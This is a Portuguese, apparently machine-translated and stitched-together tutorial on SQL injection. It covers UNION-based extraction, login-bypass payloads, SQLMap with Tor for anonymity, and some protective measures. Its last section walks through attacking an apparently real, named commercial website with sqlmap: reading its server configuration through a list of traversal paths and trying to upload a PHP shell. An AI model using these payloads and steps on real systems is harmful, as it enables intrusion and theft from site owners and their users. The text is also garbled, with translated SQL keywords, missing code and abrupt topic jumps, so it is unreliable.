1. SQLMap EWAF (Rede Aplicativo Firewall ): WAF é uma camada adicional de proteção para aplicações web, complicando significativamente a análise e operação usando métodos padrão disponíveis no SQLMap. Para isso, existe uma função “tamper -script”, que simplifica muito o trabalho com aplicações web localizadas atrás de um WAF.
2. SQLMap e anonimato: Se quiser ocultar sua identidade e se passar por anônimo para o aplicativo de destino, você pode usar o servidor proxy TOR (The Onion Router). No SQLMap você pode configurar o proxy TOR para ocultar a fonte a partir da qual o tráfego ou solicitação é gerado com as seguintes chaves:
   • — para – mudar o utilitário para o modo proxy TOR.
   • — — para — tipo – configuração manual do protocolo proxy TOR (HTTP /SOCKS 4/4a /5).
   • — — verificar — para – verificando a funcionalidade do proxy TOR

Saudações, leitor. Ultimamente tenho me interessado por segurança na Web e, até certo ponto, meu trabalho está relacionado a isso. Porque Cada vez mais comecei a notar tópicos em vários fóruns pedindo-lhes que mostrassem como tudo funciona, então decidi escrever um artigo. O artigo será direcionado a quem ainda não encontrou isso, mas gostaria de aprender. Existem relativamente muitos artigos sobre esse assunto na Internet, mas para iniciantes eles são um pouco complicados. Tentarei descrever tudo em linguagem clara e exemplos detalhados.

Prefácio

Acredito que apenas ler o artigo não será suficiente, pois... precisamos de exemplos vivos - como você sabe, a prática, no processo de memorização, nunca é supérflua. Portanto, escreveremos scripts vulneráveis ​​e treinaremos neles.

O que é injeção de SQL?

O pai escreveu um bilhete para a mãe para dar 100 rublos a Vasya e colocá-lo sobre a mesa. Retrabalhando isso em uma linguagem SQL cômica, obtemos:
TIRE 100 RUBLOS DA SUA CARTEIRA E DÊ-OS A Vasya

Como o pai escreveu mal o bilhete (caligrafia desajeitada) e o deixou sobre a mesa, o irmão de Vasya, Petya, viu. Petya, sendo um hacker, adicionou “OR Pete” ali e o resultado foi o seguinte pedido:
TIRE 100 RUBLOS DA SUA CARTEIRA E DÊ-OS PARA Vasya OU Petya

Mamãe, depois de ler o bilhete, decidiu que ontem deu dinheiro para Vasya e deu 100 rublos para Petya. Aqui está um exemplo simples de injeção de SQL :) Sem filtrar os dados (mamãe mal conseguia entender a caligrafia), Petya obteve lucro.

Preparação

Injeção de SQL de pesquisa

Como você já entendeu, a injeção vem de dados recebidos que não são filtrados. O erro mais comum é não filtrar o ID transmitido. Bem, grosso modo, coloque aspas em todos os campos. Seja uma solicitação GET/POST ou até mesmo um Cookie!

Parâmetro de entrada numérico

Porque Nossa solicitação não tem filtragem:

$id = $_GET["id"]; $query = "SELECT * FROM notícias WHERE id=$id";

O script entenderá isso como

SELECIONE * DE notícias ONDE id=1"

E isso nos dará um erro:
Aviso: mysql_fetch_array() espera que o parâmetro 1 seja um recurso, booleano fornecido em C:\WebServ\domains\sqlinj\index1.php na linha 16

Se o erro não aparecer, pode haver os seguintes motivos:

1. A injeção de SQL não está aqui - as cotações são filtradas ou vale a pena converter para (int)
2. A saída de erro está desabilitada.

Se você ainda receber um erro - Viva! Encontramos o primeiro tipo de injeção SQL - parâmetro de entrada numérico.

Parâmetro de entrada de string

Enviaremos solicitações para index2.php. Neste arquivo, a solicitação se parece com:
$usuário = $_GET["usuário"]; $query = "SELECT * FROM notícias WHERE user="$user"";

Aqui selecionamos notícias por nome de usuário e, novamente, não filtramos.
Novamente enviamos uma solicitação com um orçamento:

Deu um erro. OK! Isso significa que há uma vulnerabilidade. Para começar, isso é o suficiente para nós - vamos praticar.

Vamos agir

Um pouco de teoria

Você provavelmente mal pode esperar para tirar algo disso além de erros. Primeiro, entenda que o sinal " -- "é considerado um comentário em SQL.

ATENÇÃO! Deve haver espaços antes e depois. Na URL eles são transmitidos como %20

Tudo o que vier depois do comentário será descartado. Ou seja, a solicitação:
SELECT * FROM notícias WHERE user="AlexanderPHP" -- habrahabra

Terá sucesso. Você pode tentar fazer isso no script index2.php enviando uma solicitação como esta:

Sqlinj/index2.php?user=AlexanderPHP"%20--%20habrahabr

Aprenda o parâmetro UNIÃO. Na linguagem SQL a palavra-chave UNIÃO usado para combinar os resultados de duas consultas SQL em uma única tabela. Ou seja, para retirar algo que precisamos de outra mesa.

Vamos aproveitar isso

Se o parâmetro for “Numérico”, então não precisamos enviar orçamento na solicitação e naturalmente colocar um comentário no final. Vamos voltar ao roteiro index1.php.

Vamos voltar para o script sqlinj/index1.php?id=1 UNION SELECT 1 . Nossa consulta ao banco de dados fica assim:
SELECT * FROM notícias WHERE id=1 UNION SELECT 1
E ele nos deu um erro, porque... para trabalhar com consultas mescladas, precisamos do mesmo número de campos.

Porque Não podemos influenciar o número deles na primeira solicitação, então precisamos selecionar o número deles na segunda para que seja igual ao primeiro.

Selecionando o número de campos

A seleção dos campos é muito simples, basta enviar as seguintes solicitações:
sqlinj/index1.php?id=1 SELEÇÃO DE UNIÃO 1,2
Erro…
sqlinj/index1.php?id=1 SELEÇÃO DE UNIÃO 1,2,3
Erro novamente!
sqlinj/index1.php?id=1 SELEÇÃO DE UNIÃO 1,2,3,4,5
Nenhum erro! Isso significa que o número de colunas é 5.

Agrupar por

Se o pedido
sqlinj/index1.php?id=1 GRUPO POR 2
não apresentou nenhum erro, o que significa que o número de campos é maior que 2. Vamos tentar:

Sqlinj/index1.php?id=1 GRUPO POR 8
Op, vemos um erro, significa que o número de campos é menor que 8.

Se não houver erro com GROUP BY 4, e com GROUP BY 6 houver erro, então o número de campos é 5

Definição de colunas de saída

Sqlinj/index1.php?id=-1 UNIÃO SELECIONE 1,2,3,4,5

Com esta ação, determinamos quais colunas serão exibidas na página. Agora, para substituir esses números pelas informações necessárias, você precisa continuar a solicitação.

Saída de dados

Digamos que sabemos que a tabela ainda existe Usuários em que os campos existem eu ia, nome E passar.
Precisamos obter informações sobre o usuário com ID=1

Portanto, vamos construir a seguinte consulta:

Sqlinj/index1.php?id=-1 UNION SELECT 1,2,3,4,5 FROM usuários WHERE id=1
O script também continua a produzir

Para isso, substituiremos os nomes dos campos no lugar dos números 1 e 3

Sqlinj/index1.php?id=-1 UNION SELECT nome,2,pass,4,5 FROM usuários WHERE id=1
Conseguimos o que precisávamos!

Para "parâmetro de entrada de string" como no script index2.php você precisa adicionar aspas no início e um comentário no final. Exemplo:
sqlinj/index2.php?user=-1" UNION SELECT nome,2,pass,4,5 FROM usuários WHERE id=1 --%20

Ler/gravar arquivos

Gravando arquivos

Lendo arquivos

Sqlinj/index2.php?user=-1" UNION SELECT 1,LOAD_FILE("1.php"),3,4,5 --%20

Assim, lemos o arquivo escrito anterior.

Métodos de proteção

Proteger-se é ainda mais fácil do que explorar uma vulnerabilidade. Basta filtrar os dados. Se você estiver passando números, use
$id = (int) $_GET["id"];
Como sugeriu o usuário malroc. Proteja-se usando DOP ou declarações preparadas.

Em vez de completar

A injeção de SQL é um ataque que explora instruções SQL dinâmicas comentando certas partes das instruções ou adicionando uma condição que sempre será verdadeira. Ele visa falhas na arquitetura de aplicativos da web e usa instruções SQL para executar código SQL malicioso:

Neste artigo, veremos as técnicas usadas em injeções de SQL e como proteger aplicações web contra tais ataques.

Como funciona a injeção de SQL

Os tipos de ataques que podem ser realizados usando injeção SQL variam de acordo com o tipo de mecanismo de banco de dados afetado. O ataque tem como alvo instruções SQL dinâmicas. Uma instrução dinâmica é uma instrução criada em tempo de execução com base em parâmetros de um formulário da web ou string de consulta URI.

Considere um aplicativo web simples com um formulário de login. O código do formulário HTML está abaixo:

• O formulário aceita um endereço de e-mail e depois a senha é enviada para um arquivo PHP chamado index.php;
• A sessão é armazenada em um cookie. Este recurso é habilitado verificando o sinalizador Remember_me. O método post é usado para enviar dados. Isso significa que os valores não são exibidos na URL.

Vamos supor que a solicitação para verificar o ID do usuário no lado do servidor seja assim:

• A solicitação usa os valores do array $_POST diretamente, sem higienizá-lo;
• A senha é criptografada usando o algoritmo MD5.

Veremos um ataque usando sqlfiddle de injeção SQL. Abra o URL http://sqlfiddle.com/ em seu navegador. A seguinte janela aparecerá na tela.

Nota: Você precisará escrever instruções SQL:

Passo 1: Insira este código no painel esquerdo:

CREATE TABLE `usuários` (`id` INT NOT NULL AUTO_INCREMENT, `email` VARCHAR(45) NULL, `senha` VARCHAR(45) NULL, CHAVE PRIMÁRIA (`id`)); insira nos usuários (e-mail, senha) valores (" [e-mail protegido]",md5("abc"));

Passo 2: Clique no botão Esquema de construção».
Etapa 3: insira o código abaixo no painel direito:

selecione * dos usuários;

Etapa 4: clique em " Execute SQL" Você verá o seguinte resultado:

Vamos supor que o usuário forneça um endereço de e-mail [e-mail protegido] e 1234 como senha. A consulta que precisa ser executada no banco de dados pode ser assim:

O exemplo de código de injeção SQL acima pode ser ignorado comentando parte da senha e adicionando uma condição que sempre será verdadeira. Vamos supor que um invasor insira os seguintes dados no campo de endereço de e-mail:

[e-mail protegido]"OU 1 = 1 LIMITE 1 --" ]

e xxx no campo de senha.

A instrução dinâmica gerada ficará assim:

• [e-mail protegido] termina com aspas simples, que encerra a string;
• OR 1 = 1 LIMITE 1 é uma condição que sempre será verdadeira e limita os resultados retornados a apenas um registro.

0; ‘AND… é um comentário SQL que exclui a parte da senha.

Copie a consulta acima e cole-a na caixa de texto FiddleRun SQL conforme mostrado abaixo:

Atividade de hackers: injeções de SQL em aplicações web

Temos um aplicativo da web simples disponível em http://www.techpanda.org/ que é especificamente vulnerável a ataques de injeção de SQL para iniciantes, para fins de demonstração. O código do formulário HTML fornecido acima foi retirado da página de autorização deste aplicativo.

Ele fornece segurança básica, como higienização de campos de e-mail. Isso significa que o código acima não pode ser usado para contornar esse mecanismo.

Para contornar isso, você pode usar o campo de senha. O diagrama abaixo mostra as etapas que você precisa seguir:

Vamos supor que o invasor forneça os seguintes dados:

Etapa 1: entrar [e-mail protegido] como um endereço de e-mail;
Etapa 2: Insira xxx’) OU 1 = 1 - ] ;

Clica no botão “Enviar”.

Ele será enviado para o painel de administração. A consulta gerada ficará assim:

O diagrama abaixo mostra como a solicitação foi gerada:

Aqui:

• A solicitação pressupõe que a criptografia MD5 seja usada;
• São usadas aspas simples de fechamento e parênteses;
• Uma condição é adicionada ao operador que sempre será verdadeira.

Normalmente, os invasores tentam usar vários métodos diferentes em um ataque de injeção de SQL para atingir seus objetivos.

Outros tipos de ataques de injeção SQL

As injeções de SQL podem causar muito mais danos do que fazer login em um sistema ignorando o mecanismo de autorização. Alguns desses ataques podem:

• Execute a exclusão de dados;
• Realizar atualização de dados;
• Adicione dados;
• Execute comandos no servidor que irão baixar e instalar programas maliciosos;
• Exporte dados valiosos, como detalhes de cartão de crédito, e-mail e senhas, para o servidor remoto do invasor.

A lista acima não está completa. Simplesmente dá uma ideia dos perigos que as injeções de SQL representam.

Ferramentas para automatizar injeções de SQL

No exemplo acima, usamos métodos de ataque manuais. Antes de realizar uma injeção de SQL, você precisa entender que existem ferramentas automatizadas que permitem realizar ataques de forma mais eficiente e rápida:

• SQLSmack;
• SQLPing2;
• SQLMap.

Como evitar injeções de SQL

Aqui estão algumas regras simples para proteção contra ataques de injeção de SQL:

A entrada do usuário não deve ser confiável. Ele sempre precisa ser limpo antes de os dados serem usados ​​em operações SQL dinâmicas.

Procedimentos armazenados- Eles podem encapsular consultas SQL e processar todos os dados de entrada como parâmetros.

Consultas preparadas- As consultas são criadas primeiro e, em seguida, todos os dados do usuário fornecidos são processados ​​como parâmetros. Isto não afeta a sintaxe da instrução SQL.

Expressões regulares- pode ser usado para detectar códigos potencialmente maliciosos e removê-los antes de executar instruções SQL.

Direitos de acesso para conectar-se ao banco de dados- para proteger contra injeções de SQL, as contas usadas para conectar-se ao banco de dados deverão receber apenas os direitos de acesso necessários. Isso ajudará a limitar as ações que as instruções SQL podem executar no servidor.

Mensagens de erro- não deve divulgar informações confidenciais. Mensagens de erro personalizadas simples, como " Desculpe, ocorreu um erro técnico. A equipe de suporte já foi notificada sobre isso. Por favor, tente novamente mais tarde" pode ser usado em vez de exibir as consultas SQL que causaram o erro.

Spoiler: .ZEN

Temos um SQL Injection no site parecido com este:

A primeira coisa que queremos fazer é verificar se temos privilégios para gravar arquivos no recurso atacado; para isso, carregue o terminal e emita o seguinte comando:

Http://www.sacoor.com/site_terms.php?lang=en --banner --current-db --current-user --is-dba

Pressionamos Enter e começa a análise do nosso SQL Injection, o relatório fica assim:

Como você pode ver no relatório, a versão do Apache, a versão do MySQL e a versão do sistema operacional instalado no servidor estão escritas, tudo isso será útil para nós no futuro, mas o mais importante, você pode ver que temos direitos para gravar arquivos, isso é exibido na linha Current User is DBA: True

O próximo passo para nós é obter os caminhos para gravar nosso shell. Podemos obter o caminho do nosso site no servidor baixando o arquivo httpd.conf. Obtemos informações sobre a localização do arquivo httpd.conf usando o Google, você pode pesquisar pela versão do sistema operacional instalado ou pela lista dos caminhos mais prováveis; Em geral, não vou me aprofundar na navegação nos mecanismos de busca, apenas quando você descobrir a localização mais provável do caminho para o arquivo, então é hora de baixar esse mesmo arquivo para o seu disco, para fazer isso, digite o seguinte comando e solicitação de leitura do arquivo no servidor:

Sqlmap –u http://www.sacoor.com/site_terms.php?lang=en --file-read=/etc/httpd/conf/httpd.conf

Observemos imediatamente que nem sempre é possível encontrar este arquivo de configuração na primeira vez, então você pode usar os caminhos mais prováveis ​​onde este arquivo pode estar localizado:

LISTA DE POSSÍVEIS CAMINHOS PARA O ARQUIVO DE CONFIGURAÇÃO:

../../../../../../../../../usr/local/apache/conf/httpd.conf ../../../../ ../../../../../usr/local/apache2/conf/httpd.conf ../../../../../../../../ usr/local/apache/httpd.conf ../../../../../../../../usr/local/apache2/httpd.conf ../../.. /../../../../../usr/local/httpd/conf/httpd.conf ../../../../../../../usr/ local/etc/apache/conf/httpd.conf ../../../../../../../usr/local/etc/apache2/conf/httpd.conf ../.. /../../../../../usr/local/etc/httpd/conf/httpd.conf ../../../../../../../ usr/apache2/conf/httpd.conf ../../../../../../../usr/apache/conf/httpd.conf ../../../.. /../../../usr/local/apps/apache2/conf/httpd.conf ../../../../../../../usr/local/apps/ apache/conf/httpd.conf ../../../../../../etc/apache/conf/httpd.conf ../../../../../. ./etc/apache2/conf/httpd.conf ../../../../../../etc/httpd/conf/httpd.conf ../../../../ ../../etc/http/conf/httpd.conf ../../../../../../etc/apache2/httpd.conf ../../../. ./../../etc/httpd/httpd.conf ../../../../../../etc/http/httpd.conf ../../../. ./../../etc/httpd.conf ../../../../../opt/apache/conf/httpd.conf ../../../../. ./opt/apache2/conf/httpd.conf ../../../../var/www/conf/httpd.conf ../conf/httpd.conf

Recebemos um relatório do sqlmap no seguinte formato:

Como você pode ver, o sqlmap nos disse que o arquivo tem o mesmo tamanho do arquivo no servidor, portanto temos o direito de ler este arquivo. Se não houvesse direitos suficientes para ler este arquivo, apareceria um erro de que o arquivo salvo em nossa máquina tem um tamanho diferente do arquivo no servidor ou não há arquivo no servidor no caminho que especificamos e nunca tem estive. O Sqlmap salvou nosso arquivo nos arquivos de relatório e para lê-lo precisamos iniciar o gerenciador de janelas. Para iniciar o gerenciador de janelas, abrimos outra janela do terminal e digitamos o comando:

A seguir, no gerenciador que se abre, seguimos o caminho onde o sqlmap adicionou o arquivo, ou seja:
/root/.sqlmap/output/sacoor.com
Em seguida, passe o cursor sobre o arquivo, pressione o botão F3 no teclado e leia o arquivo de configuração do Apache:

Em nosso arquivo de configuração vemos que nosso site está localizado no servidor no seguinte caminho:
/home/sbshop/site/

Agora que temos algumas informações, podemos tentar preencher o shell, para isso digitamos o seguinte comando:

Sqlmap –u http://www.sacoor.com/site_terms.php?lang=en --os-cmd –v l

Após inserir o comando, o sqlmap irá perguntar que tipo de filler queremos utilizar, pois... no nosso caso o site está em PHP, então faremos o upload do PHP-loader, selecione o item 4 e pressione Enter. A seguir, o sqlmap nos pedirá para escolher onde iremos carregar nosso carregador, e desde... Já sabemos o caminho do nosso site no servidor, selecione o item 2, pressione Enter e indique o caminho para o site:
/home/sbshop/site/

E depois disso, pressione Enter e veja o seguinte relatório:

Neste caso, o sqlmap nos informa que não temos direitos de gravação nesta pasta. Não tem problema, esse problema é bastante fácil de resolver. Damos o comando para iniciar o uniscan e verificar a capacidade de escrita dos arquivos e pastas, aqui está o comando.